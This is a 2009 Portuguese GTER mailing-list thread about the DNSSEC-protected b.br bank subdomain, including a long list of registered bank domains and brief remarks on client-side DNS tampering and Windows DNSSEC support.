http://www.nic.br/atividades/dom-bbr.htm >> >> *Banco Alfa S/A >> Banco BBM S/A >> Banco Bonsucesso S/A >> Banco Bradesco S/A >> Banco Bradesco BBI S/A >> Banco BVA S/A >> Banco Cooperativo Sicredi S/A - BANSICREDI >> Banco do Brasil S/A >> Banco do Estado do Par? S/A >> Banco Ita? S/A >> Banco do Nordeste do Brasil S/A >> Banco Industrial e Comercial S/A >> Banco Panamericano S/A >> Banco Prosper S/A >> Banco Safra S/A >> Banco Schahin S/A >> Banco Triangulo S/A >> Banco Votorantim S/A >> Banrisul - Banco do Estado do Rio Grande do Sul >> Caixa Econ?mica Federal >> Paran? Banco S/A >> Unibanco * >> alfa.b.br >> alfanet.b.br >> bancoalfa.b.br >> >> bahiabank.b.br >> bancobbm.b.br >> bbmbank.b.br >> bbminvestimentos.b.br >> >> bancobonsucesso.b.br >> >> bradesco.b.br >> todasasrazoes.b.br >> bancobradesco.b.br >> bradescobbi.b.br >> bradescocambio.b.br >> bradescocartoes.b.br >> bradescocomercioeletronico.b.br < >> http://www.bradescocomercioeletronico.b.br> >> bradescocorporate.b.br >> bradescoempresas.b.br >> bradescopessoajuridica.b.br >> bradescoprime.b.br >> bradescoprivate.b.br >> bradescori.b.br >> bradescouniversitarios.b.br >> bradescoseguranca.b.br >> bradescopoderpublico.b.br >> bradesconikkei.b.br >> bancodoplaneta.b.br >> bradescorural.b.br >> bancoalvorada.b.br >> bancobcn.b.br >> bancobbi.b.br >> bancofinasa.b.br >> bbi.b.br >> bcn.b.br >> bancobmc.b.br >> bankpar.b.br >> bancoboavista.b.br >> bancofinasabmc.b.br >> boavista.b.br >> bancobradescobbi.b.br >> bmc.b.br >> bancobankpar.b.br >> baneb.b.br >> bradescosaude.b.br >> bradescoseguros.b.br >> 2000e9.b.br >> 2000e9bradesco.b.br >> 2000enove.b.br >> 2000enovebradesco.b.br >> 2000i9.b.br >> 2000i9bradesco.b.br >> 2000inove.b.br >> 2000inovebradesco.b.br >> bradesco2000e9.b.br >> bradesco2000enove.b.br >> bradesco2000i9.b.br >> bradesco2000inove.b.br >> bradescodoismilenove.b.br >> bradescodoismilinove.b.br >> bradescoinove.b.br >> doismilenovebradesco.b.br >> doismilinovebradesco.b.br >> bradescomediacenter.b.br >> bradescopocket.b.br >> bradescovidaeprevidencia.b.br >> clickconta.b.b >> corporatebradesco.b.br >> fb.b.br >> shopcredit.b.br >> shopfacil.b.br >> shopinvest.b.br >> >> alvorada.b.br >> bradescocapitalizacao.b.br >> bradescocelular.b.br >> bradescoimoveis.b.br >> bradescocustodia.b.br >> bradescoconsorcio.b.br >> bradescoprevidencia.b.br >> bradespar.b.br >> finasaesportes.b.br >> cidadetran.b.br >> finasa.b.br >> economiaemdia.b.br >> bradesconetexpress.b.br >> bradescorsa.b.br >> >> bancobci.b.br >> bancobva.b.br >> bancoconceito.b.br >> bancomultiner.b.br >> bancosolidez.b.br >> bancovalor.b.br >> bancovetor.b.br >> bancovitoria.b.br >> bvadireto.b.br >> cdbmais.b.br >> cdbseguro.b.br >> descontonline.b.br >> finameexpress.b.br >> finamexpress.b.br >> fixseguro.b.br >> moneyshopping.b.br >> multiaplic.b.br >> multicdb.b.br >> multicredito.b.br >> ndigi.b.br >> negociosdigitais.b.br >> pegcred.b.br >> pegcredito.b.br >> peguecred.b.br >> peguecredito.b.br >> >> sicredi.b.br >> >> bancobrasil.b.br >> bancodobrasil.b.br >> bb.b.br >> >> banparanet.b.br >> >> itau.b.br >> >> bnb.b.br >> >> bicbanco.b.br >> >> bancopanamericano.b.br >> panamericano.b.br >> >> bancoprosper.b.br >> prosper.b.br >> >> safra.b.br >> >> schahin.b.br >> bancoschahin.b.br >> >> bancotriangulo.b.br >> tribanco.b.br >> tribanconline.b.br >> tribancoonline.b.br >> >> bancovotorantim.b.br >> >> banrisul.b.br >> >> bankingcaixa.b.br >> caixaeconomica.b.br >> caixaeconomicafederal.b.br >> cef.b.br >> fgts.b.br >> caixa.b.br >> >> paranabanco.b.br >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > -- gter list https://eng.registro.br/mailman/listinfo/gter From MBORBA at trf3.jus.br Wed Jun 10 18:51:35 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Wed, 10 Jun 2009 18:51:35 -0300 Subject: [GTER] RES: b.br - meio "off topic"... Message-ID: <4A3000B702000046000202C0@svntrf311.trf3.jus.br> Demi e colegas da GTER, Apenas um "caveat": a esta??o do usu?rio deve estar isenta de artefatos maliciosos que, de alguma forma, interfiram no processo de resolu??o de nomes (por exemplo, for?ando o uso de servidores DNS comprometidos, ou levando o sistema operacional a usar uma tabela de "hosts" local). ? bom lembrar que, na extremidade do cliente, h? ainda desde Ruindows 98 a XP e estes n?o suportam, nativamente, resolu??o melhorada por DNSSEC. Isso deve chegar no Ruindows Server 2008 R2 e no Ruindows 7 [1]. [1] http://blogs.technet.com/risco/archive/2009/01/04/suporte-a-dnssec-no-windows-server-2008-r2-e-windows-7.aspx Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio - Seguran?a da Informa??o IPv6 Evangelist - MoReq-Jus Evangelist TRF 3a Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- >>> "Gustavo Aguiar" 10/06/09 16:46 >>> Bem, vou contribuir questionando meu banco pq ele n?o esta nessa lista! :D E vou divulgar para os amigos... Abs, -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Demi Getschko Enviada em: quarta-feira, 10 de junho de 2009 16:01 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] b.br - meio "off topic"... O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: 1- s? bancos moram l?; 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso testado quando ingressaram no sub-dom?nio); Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na origem) garantindo a tradu??o de nomes para n?meros. (No com.br, os bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar algu?m ? confus?o com a tal "engenharia social"... abra?o demi Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... Emiliano Martins wrote: > Demi, > Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves do > com.br? > > > > 2009/6/10 Demi Getschko > > >> Prezados >> >> Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus >> dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e >> outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do banco >> assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como >> dificilmente veremos campanha de marquetim falando nisso (at? pelos valores >> investidos na divulga??o do com.br), uma id?ia ? come?armos uma divulga??o >> "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? >> a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio do >> banco com o b.br, sempre que ele existir... >> Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem >> alfab?tica. A lista dos dom?nios completa est? em: >> http://www.nic.br/atividades/dom-bbr.htm >> >> *Banco Alfa S/A >> Banco BBM S/A >> Banco Bonsucesso S/A >> Banco Bradesco S/A >> Banco Bradesco BBI S/A >> Banco BVA S/A >> Banco Cooperativo Sicredi S/A - BANSICREDI >> Banco do Brasil S/A >> Banco do Estado do Par? S/A >> Banco Ita? S/A >> Banco do Nordeste do Brasil S/A >> Banco Industrial e Comercial S/A >> Banco Panamericano S/A >> Banco Prosper S/A >> Banco Safra S/A >> Banco Schahin S/A >> Banco Triangulo S/A >> Banco Votorantim S/A >> Banrisul - Banco do Estado do Rio Grande do Sul >> Caixa Econ?mica Federal >> Paran? Banco S/A >> Unibanco * >> alfa.b.br >> alfanet.b.br >> bancoalfa.b.br >> >> bahiabank.b.br >> bancobbm.b.br >> bbmbank.b.br >> bbminvestimentos.b.br >> >> bancobonsucesso.b.br >> >> bradesco.b.br >> todasasrazoes.b.br >> bancobradesco.b.br >> bradescobbi.b.br >> bradescocambio.b.br >> bradescocartoes.b.br >> bradescocomercioeletronico.b.br < >> http://www.bradescocomercioeletronico.b.br> >> bradescocorporate.b.br >> bradescoempresas.b.br >> bradescopessoajuridica.b.br >> bradescoprime.b.br >> bradescoprivate.b.br >> bradescori.b.br >> bradescouniversitarios.b.br >> bradescoseguranca.b.br >> bradescopoderpublico.b.br >> bradesconikkei.b.br >> bancodoplaneta.b.br >> bradescorural.b.br >> bancoalvorada.b.br >> bancobcn.b.br >> bancobbi.b.br >> bancofinasa.b.br >> bbi.b.br >> bcn.b.br >> bancobmc.b.br >> bankpar.b.br >> bancoboavista.b.br >> bancofinasabmc.b.br >> boavista.b.br >> bancobradescobbi.b.br >> bmc.b.br >> bancobankpar.b.br >> baneb.b.br >> bradescosaude.b.br >> bradescoseguros.b.br >> 2000e9.b.br >> 2000e9bradesco.b.br >> 2000enove.b.br >> 2000enovebradesco.b.br >> 2000i9.b.br >> 2000i9bradesco.b.br >> 2000inove.b.br >> 2000inovebradesco.b.br >> bradesco2000e9.b.br >> bradesco2000enove.b.br >> bradesco2000i9.b.br >> bradesco2000inove.b.br >> bradescodoismilenove.b.br >> bradescodoismilinove.b.br >> bradescoinove.b.br >> doismilenovebradesco.b.br >> doismilinovebradesco.b.br >> bradescomediacenter.b.br >> bradescopocket.b.br >> bradescovidaeprevidencia.b.br >> clickconta.b.b >> corporatebradesco.b.br >> fb.b.br >> shopcredit.b.br >> shopfacil.b.br >> shopinvest.b.br >> >> alvorada.b.br >> bradescocapitalizacao.b.br >> bradescocelular.b.br >> bradescoimoveis.b.br >> bradescocustodia.b.br >> bradescoconsorcio.b.br >> bradescoprevidencia.b.br >> bradespar.b.br >> finasaesportes.b.br >> cidadetran.b.br >> finasa.b.br >> economiaemdia.b.br >> bradesconetexpress.b.br >> bradescorsa.b.br >> >> bancobci.b.br >> bancobva.b.br >> bancoconceito.b.br >> bancomultiner.b.br >> bancosolidez.b.br >> bancovalor.b.br >> bancovetor.b.br >> bancovitoria.b.br >> bvadireto.b.br >> cdbmais.b.br >> cdbseguro.b.br >> descontonline.b.br >> finameexpress.b.br >> finamexpress.b.br >> fixseguro.b.br >> moneyshopping.b.br >> multiaplic.b.br >> multicdb.b.br >> multicredito.b.br >> ndigi.b.br >> negociosdigitais.b.br >> pegcred.b.br >> pegcredito.b.br >> peguecred.b.br >> peguecredito.b.br >> >> sicredi.b.br >> >> bancobrasil.b.br >> bancodobrasil.b.br >> bb.b.br >> >> banparanet.b.br >> >> itau.b.br >> >> bnb.b.br >> >> bicbanco.b.br >> >> bancopanamericano.b.br >> panamericano.b.br >> >> bancoprosper.b.br >> prosper.b.br >> >> safra.b.br >> >> schahin.b.br >> bancoschahin.b.br >> >> bancotriangulo.b.br >> tribanco.b.br >> tribanconline.b.br >> tribancoonline.b.br >> >> bancovotorantim.b.br >> >> banrisul.b.br >> >> bankingcaixa.b.br >> caixaeconomica.b.br >> caixaeconomicafederal.b.br >> cef.b.br >> fgts.b.br >> caixa.b.br >> >> paranabanco.b.br >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > -- gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter From MBORBA at trf3.jus.br Wed Jun 10 18:56:51 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Wed, 10 Jun 2009 18:56:51 -0300 Subject: [GTER] RES: b.br - meio "off topic"... Message-ID: <4A3001F302000046000202C4@svntrf311.trf3.jus.br> Demi e colegas da GTER, Apesar do meu coment?rio anterior, tenho o intuito de contribuir tamb?m, e o farei recomendando ao pessoal daqui do TRF que prefira os "sites" pertencentes ao dom?nio .b.br (embora haja uma "parede cultural" de dimens?es incomensur?veis a ser escalada...). Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio - Seguran?a da Informa??o IPv6 Evangelist - MoReq-Jus Evangelist TRF 3a Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- >>> "Gustavo Aguiar" 10/06/09 16:46 >>> Bem, vou contribuir questionando meu banco pq ele n?o esta nessa lista! :D E vou divulgar para os amigos... [...] From rubensk at gmail.com Wed Jun 10 20:24:03 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Wed, 10 Jun 2009 20:24:03 -0300 Subject: [GTER] RES: b.br - meio "off topic"... In-Reply-To: <4A3000B702000046000202C0@svntrf311.trf3.jus.br> References: <4A3000B702000046000202C0@svntrf311.trf3.jus.br> Message-ID: <6bb5f5b10906101624y3cec930l7abccafea043a102@mail.gmail.com> Marlon, Essa ? uma quest?o de TCB: http://en.wikipedia.org/wiki/Trusted_Computing_Base Rompido o v?u do TCB, nenhum resultado ? confi?vel, n?o importa o que acontece. Rubens 2009/6/10 MARLON BORBA : > Demi e colegas da GTER, > > Apenas um "caveat": a esta??o do usu?rio deve estar isenta de artefatos maliciosos que, de alguma forma, interfiram no processo de resolu??o de nomes (por exemplo, for?ando o uso de servidores DNS comprometidos, ou levando o sistema operacional a usar uma tabela de "hosts" local). > > ? bom lembrar que, na extremidade do cliente, h? ainda desde Ruindows 98 a XP e estes n?o suportam, nativamente, resolu??o melhorada por DNSSEC. Isso deve chegar no Ruindows Server 2008 R2 e no Ruindows 7 [1]. > > > > [1] http://blogs.technet.com/risco/archive/2009/01/04/suporte-a-dnssec-no-windows-server-2008-r2-e-windows-7.aspx > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio - Seguran?a da Informa??o > IPv6 Evangelist - MoReq-Jus Evangelist > TRF 3a Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- >>>> "Gustavo Aguiar" 10/06/09 16:46 >>> > Bem, vou contribuir questionando meu banco pq ele n?o esta nessa lista! :D > E vou divulgar para os amigos... > > Abs, > > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em > nome de Demi Getschko > Enviada em: quarta-feira, 10 de junho de 2009 16:01 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] b.br - meio "off topic"... > > O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: > 1- s? bancos moram l?; > 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso > testado quando ingressaram no sub-dom?nio); > Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a > crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na > origem) garantindo a tradu??o de nomes para n?meros. ?(No com.br, os > bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar > algu?m ? confus?o com a tal "engenharia social"... > abra?o > demi > Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do > judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... > > > > > Emiliano Martins wrote: >> Demi, >> Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves > do >> com.br? >> >> >> >> 2009/6/10 Demi Getschko >> >> >>> Prezados >>> >>> Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus >>> dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e >>> outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do > banco >>> assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como >>> dificilmente veremos campanha de marquetim falando nisso (at? pelos > valores >>> investidos na divulga??o do com.br), uma id?ia ? come?armos uma > divulga??o >>> "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? >>> a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio > do >>> banco com o b.br, sempre que ele existir... >>> Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem >>> alfab?tica. A lista dos dom?nios completa est? em: >>> http://www.nic.br/atividades/dom-bbr.htm >>> >>> *Banco Alfa S/A >>> Banco BBM S/A >>> Banco Bonsucesso S/A >>> Banco Bradesco S/A >>> Banco Bradesco BBI S/A >>> Banco BVA S/A >>> Banco Cooperativo Sicredi S/A - BANSICREDI >>> Banco do Brasil S/A >>> Banco do Estado do Par? S/A >>> Banco Ita? S/A >>> Banco do Nordeste do Brasil S/A >>> Banco Industrial e Comercial S/A >>> Banco Panamericano S/A >>> Banco Prosper S/A >>> Banco Safra S/A >>> Banco Schahin S/A >>> Banco Triangulo S/A >>> Banco Votorantim S/A >>> Banrisul - Banco do Estado do Rio Grande do Sul >>> Caixa Econ?mica Federal >>> Paran? Banco S/A >>> Unibanco * >>> alfa.b.br >>> alfanet.b.br >>> bancoalfa.b.br >>> >>> bahiabank.b.br >>> bancobbm.b.br >>> bbmbank.b.br >>> bbminvestimentos.b.br >>> >>> bancobonsucesso.b.br >>> >>> bradesco.b.br >>> todasasrazoes.b.br >>> bancobradesco.b.br >>> bradescobbi.b.br >>> bradescocambio.b.br >>> bradescocartoes.b.br >>> bradescocomercioeletronico.b.br < >>> http://www.bradescocomercioeletronico.b.br> >>> bradescocorporate.b.br >>> bradescoempresas.b.br >>> bradescopessoajuridica.b.br >>> bradescoprime.b.br >>> bradescoprivate.b.br >>> bradescori.b.br >>> bradescouniversitarios.b.br >>> bradescoseguranca.b.br >>> bradescopoderpublico.b.br >>> bradesconikkei.b.br >>> bancodoplaneta.b.br >>> bradescorural.b.br >>> bancoalvorada.b.br >>> bancobcn.b.br >>> bancobbi.b.br >>> bancofinasa.b.br >>> bbi.b.br >>> bcn.b.br >>> bancobmc.b.br >>> bankpar.b.br >>> bancoboavista.b.br >>> bancofinasabmc.b.br >>> boavista.b.br >>> bancobradescobbi.b.br >>> bmc.b.br >>> bancobankpar.b.br >>> baneb.b.br >>> bradescosaude.b.br >>> bradescoseguros.b.br >>> 2000e9.b.br >>> 2000e9bradesco.b.br >>> 2000enove.b.br >>> 2000enovebradesco.b.br >>> 2000i9.b.br >>> 2000i9bradesco.b.br >>> 2000inove.b.br >>> 2000inovebradesco.b.br >>> bradesco2000e9.b.br >>> bradesco2000enove.b.br >>> bradesco2000i9.b.br >>> bradesco2000inove.b.br >>> bradescodoismilenove.b.br >>> bradescodoismilinove.b.br >>> bradescoinove.b.br >>> doismilenovebradesco.b.br >>> doismilinovebradesco.b.br >>> bradescomediacenter.b.br >>> bradescopocket.b.br >>> bradescovidaeprevidencia.b.br >>> clickconta.b.b >>> corporatebradesco.b.br >>> fb.b.br >>> shopcredit.b.br >>> shopfacil.b.br >>> shopinvest.b.br >>> >>> alvorada.b.br >>> bradescocapitalizacao.b.br >>> bradescocelular.b.br >>> bradescoimoveis.b.br >>> bradescocustodia.b.br >>> bradescoconsorcio.b.br >>> bradescoprevidencia.b.br >>> bradespar.b.br >>> finasaesportes.b.br >>> cidadetran.b.br >>> finasa.b.br >>> economiaemdia.b.br >>> bradesconetexpress.b.br >>> bradescorsa.b.br >>> >>> bancobci.b.br >>> bancobva.b.br >>> bancoconceito.b.br >>> bancomultiner.b.br >>> bancosolidez.b.br >>> bancovalor.b.br >>> bancovetor.b.br >>> bancovitoria.b.br >>> bvadireto.b.br >>> cdbmais.b.br >>> cdbseguro.b.br >>> descontonline.b.br >>> finameexpress.b.br >>> finamexpress.b.br >>> fixseguro.b.br >>> moneyshopping.b.br >>> multiaplic.b.br >>> multicdb.b.br >>> multicredito.b.br >>> ndigi.b.br >>> negociosdigitais.b.br >>> pegcred.b.br >>> pegcredito.b.br >>> peguecred.b.br >>> peguecredito.b.br >>> >>> sicredi.b.br >>> >>> bancobrasil.b.br >>> bancodobrasil.b.br >>> bb.b.br >>> >>> banparanet.b.br >>> >>> itau.b.br >>> >>> bnb.b.br >>> >>> bicbanco.b.br >>> >>> bancopanamericano.b.br >>> panamericano.b.br >>> >>> bancoprosper.b.br >>> prosper.b.br >>> >>> safra.b.br >>> >>> schahin.b.br >>> bancoschahin.b.br >>> >>> bancotriangulo.b.br >>> tribanco.b.br >>> tribanconline.b.br >>> tribancoonline.b.br >>> >>> bancovotorantim.b.br >>> >>> banrisul.b.br >>> >>> bankingcaixa.b.br >>> caixaeconomica.b.br >>> caixaeconomicafederal.b.br >>> cef.b.br >>> fgts.b.br >>> caixa.b.br >>> >>> paranabanco.b.br >>> >>> >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >>> >> >> >> >> > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From MBORBA at trf3.jus.br Wed Jun 10 21:37:36 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Wed, 10 Jun 2009 21:37:36 -0300 Subject: [GTER] RES: b.br - meio "off topic"... Message-ID: <4A3027A002000046000202D0@svntrf311.trf3.jus.br> Aplica-se ao universo do "usu?rio m?dio dom?stico"? :P Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio - Seguran?a da Informa??o IPv6 Evangelist - MoReq-Jus Evangelist TRF 3a Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- >>> Rubens Kuhl 10/06/09 20:24 >>> Marlon, Essa ? uma quest?o de TCB: http://en.wikipedia.org/wiki/Trusted_Computing_Base Rompido o v?u do TCB, nenhum resultado ? confi?vel, n?o importa o que acontece. Rubens 2009/6/10 MARLON BORBA : > Demi e colegas da GTER, > > Apenas um "caveat": a esta??o do usu?rio deve estar isenta de artefatos maliciosos que, de alguma forma, interfiram no processo de resolu??o de nomes (por exemplo, for?ando o uso de servidores DNS comprometidos, ou levando o sistema operacional a usar uma tabela de "hosts" local). > > ? bom lembrar que, na extremidade do cliente, h? ainda desde Ruindows 98 a XP e estes n?o suportam, nativamente, resolu??o melhorada por DNSSEC. Isso deve chegar no Ruindows Server 2008 R2 e no Ruindows 7 [1]. > > > > [1] http://blogs.technet.com/risco/archive/2009/01/04/suporte-a-dnssec-no-windows-server-2008-r2-e-windows-7.aspx > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio - Seguran?a da Informa??o > IPv6 Evangelist - MoReq-Jus Evangelist > TRF 3a Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- >>>> "Gustavo Aguiar" 10/06/09 16:46 >>> > Bem, vou contribuir questionando meu banco pq ele n?o esta nessa lista! :D > E vou divulgar para os amigos... > > Abs, > > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em > nome de Demi Getschko > Enviada em: quarta-feira, 10 de junho de 2009 16:01 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] b.br - meio "off topic"... > > O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: > 1- s? bancos moram l?; > 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso > testado quando ingressaram no sub-dom?nio); > Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a > crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na > origem) garantindo a tradu??o de nomes para n?meros. (No com.br, os > bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar > algu?m ? confus?o com a tal "engenharia social"... > abra?o > demi > Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do > judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... > > > > > Emiliano Martins wrote: >> Demi, >> Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves > do >> com.br? >> >> >> >> 2009/6/10 Demi Getschko >> >> >>> Prezados >>> >>> Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus >>> dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e >>> outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do > banco >>> assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como >>> dificilmente veremos campanha de marquetim falando nisso (at? pelos > valores >>> investidos na divulga??o do com.br), uma id?ia ? come?armos uma > divulga??o >>> "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? >>> a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio > do >>> banco com o b.br, sempre que ele existir... >>> Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem >>> alfab?tica. A lista dos dom?nios completa est? em: >>> http://www.nic.br/atividades/dom-bbr.htm >>> >>> *Banco Alfa S/A >>> Banco BBM S/A >>> Banco Bonsucesso S/A >>> Banco Bradesco S/A >>> Banco Bradesco BBI S/A >>> Banco BVA S/A >>> Banco Cooperativo Sicredi S/A - BANSICREDI >>> Banco do Brasil S/A >>> Banco do Estado do Par? S/A >>> Banco Ita? S/A >>> Banco do Nordeste do Brasil S/A >>> Banco Industrial e Comercial S/A >>> Banco Panamericano S/A >>> Banco Prosper S/A >>> Banco Safra S/A >>> Banco Schahin S/A >>> Banco Triangulo S/A >>> Banco Votorantim S/A >>> Banrisul - Banco do Estado do Rio Grande do Sul >>> Caixa Econ?mica Federal >>> Paran? Banco S/A >>> Unibanco * >>> alfa.b.br >>> alfanet.b.br >>> bancoalfa.b.br >>> >>> bahiabank.b.br >>> bancobbm.b.br >>> bbmbank.b.br >>> bbminvestimentos.b.br >>> >>> bancobonsucesso.b.br >>> >>> bradesco.b.br >>> todasasrazoes.b.br >>> bancobradesco.b.br >>> bradescobbi.b.br >>> bradescocambio.b.br >>> bradescocartoes.b.br >>> bradescocomercioeletronico.b.br < >>> http://www.bradescocomercioeletronico.b.br> >>> bradescocorporate.b.br >>> bradescoempresas.b.br >>> bradescopessoajuridica.b.br >>> bradescoprime.b.br >>> bradescoprivate.b.br >>> bradescori.b.br >>> bradescouniversitarios.b.br >>> bradescoseguranca.b.br >>> bradescopoderpublico.b.br >>> bradesconikkei.b.br >>> bancodoplaneta.b.br >>> bradescorural.b.br >>> bancoalvorada.b.br >>> bancobcn.b.br >>> bancobbi.b.br >>> bancofinasa.b.br >>> bbi.b.br >>> bcn.b.br >>> bancobmc.b.br >>> bankpar.b.br >>> bancoboavista.b.br >>> bancofinasabmc.b.br >>> boavista.b.br >>> bancobradescobbi.b.br >>> bmc.b.br >>> bancobankpar.b.br >>> baneb.b.br >>> bradescosaude.b.br >>> bradescoseguros.b.br >>> 2000e9.b.br >>> 2000e9bradesco.b.br >>> 2000enove.b.br >>> 2000enovebradesco.b.br >>> 2000i9.b.br >>> 2000i9bradesco.b.br >>> 2000inove.b.br >>> 2000inovebradesco.b.br >>> bradesco2000e9.b.br >>> bradesco2000enove.b.br >>> bradesco2000i9.b.br >>> bradesco2000inove.b.br >>> bradescodoismilenove.b.br >>> bradescodoismilinove.b.br >>> bradescoinove.b.br >>> doismilenovebradesco.b.br >>> doismilinovebradesco.b.br >>> bradescomediacenter.b.br >>> bradescopocket.b.br >>> bradescovidaeprevidencia.b.br >>> clickconta.b.b >>> corporatebradesco.b.br >>> fb.b.br >>> shopcredit.b.br >>> shopfacil.b.br >>> shopinvest.b.br >>> >>> alvorada.b.br >>> bradescocapitalizacao.b.br >>> bradescocelular.b.br >>> bradescoimoveis.b.br >>> bradescocustodia.b.br >>> bradescoconsorcio.b.br >>> bradescoprevidencia.b.br >>> bradespar.b.br >>> finasaesportes.b.br >>> cidadetran.b.br >>> finasa.b.br >>> economiaemdia.b.br >>> bradesconetexpress.b.br >>> bradescorsa.b.br >>> >>> bancobci.b.br >>> bancobva.b.br >>> bancoconceito.b.br >>> bancomultiner.b.br >>> bancosolidez.b.br >>> bancovalor.b.br >>> bancovetor.b.br >>> bancovitoria.b.br >>> bvadireto.b.br >>> cdbmais.b.br >>> cdbseguro.b.br >>> descontonline.b.br >>> finameexpress.b.br >>> finamexpress.b.br >>> fixseguro.b.br >>> moneyshopping.b.br >>> multiaplic.b.br >>> multicdb.b.br >>> multicredito.b.br >>> ndigi.b.br >>> negociosdigitais.b.br >>> pegcred.b.br >>> pegcredito.b.br >>> peguecred.b.br >>> peguecredito.b.br >>> >>> sicredi.b.br >>> >>> bancobrasil.b.br >>> bancodobrasil.b.br >>> bb.b.br >>> >>> banparanet.b.br >>> >>> itau.b.br >>> >>> bnb.b.br >>> >>> bicbanco.b.br >>> >>> bancopanamericano.b.br >>> panamericano.b.br >>> >>> bancoprosper.b.br >>> prosper.b.br >>> >>> safra.b.br >>> >>> schahin.b.br >>> bancoschahin.b.br >>> >>> bancotriangulo.b.br >>> tribanco.b.br >>> tribanconline.b.br >>> tribancoonline.b.br >>> >>> bancovotorantim.b.br >>> >>> banrisul.b.br >>> >>> bankingcaixa.b.br >>> caixaeconomica.b.br >>> caixaeconomicafederal.b.br >>> cef.b.br >>> fgts.b.br >>> caixa.b.br >>> >>> paranabanco.b.br >>> >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> >> >> >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From aquino at ecosistemas.com.br Wed Jun 10 11:25:36 2009 From: aquino at ecosistemas.com.br (Lucio de Aquino Marinho) Date: Wed, 10 Jun 2009 11:25:36 -0300 Subject: [GTER] Diveo com problemas? In-Reply-To: References: Message-ID: <4A2FC260.3060504@ecosistemas.com.br> Link 2 Mbit , Rio de janeiro acessa alguns sites outros n?o Ricardo Guimaraes escreveu: > Estamos com dois links da Diveo fora neste momento. SP, regi?o da Vila > Ol?mpia. > > On Wed, Jun 10, 2009 at 